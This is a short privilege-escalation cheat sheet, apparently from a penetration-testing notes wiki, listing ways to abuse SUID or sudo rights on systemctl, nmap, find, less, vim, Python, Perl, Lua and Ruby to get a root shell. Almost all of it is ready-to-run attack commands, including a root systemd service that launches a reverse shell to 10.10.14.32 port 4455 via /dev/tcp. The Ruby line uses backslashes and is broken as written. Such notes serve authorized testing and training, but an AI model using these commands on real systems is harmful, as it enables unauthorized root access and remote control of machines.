SUID

How to exploit SUID for the following files

systemctl

echo '[Service]              
> Type=oneshot
> User=root
> ExecStart=/bin/bash /home/pepper/getRoot.sh
> [Install]
> WantedBy=multi-user.target' > hack.service

## create getRoot.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.14.32/4455 0>&1

systemctl link /home/pepper/hack.service
systemctl enable --now /home/pepper/hack.service
systemctl start hack.service

Nmap

echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse

FIND

find . -exec bash -i \;

LESS

v
:shell

!bash

VIM

!/bin/bash
#or
:shell

PYTHON

>> import os
>> os.system('/bin/bash')

PERL

exec "/bin/bash";
# Ctrl D for EoF

LUA

> os.execute("/bin/bash")

RUBY

exec "\bin\bash"

PreviousUpgrading Shells NextBasic checks / powershell

Last updated 5 years ago

Was this helpful?

systemctl

Nmap

FIND

LESS

MORE

VIM

PYTHON

PERL

LUA

RUBY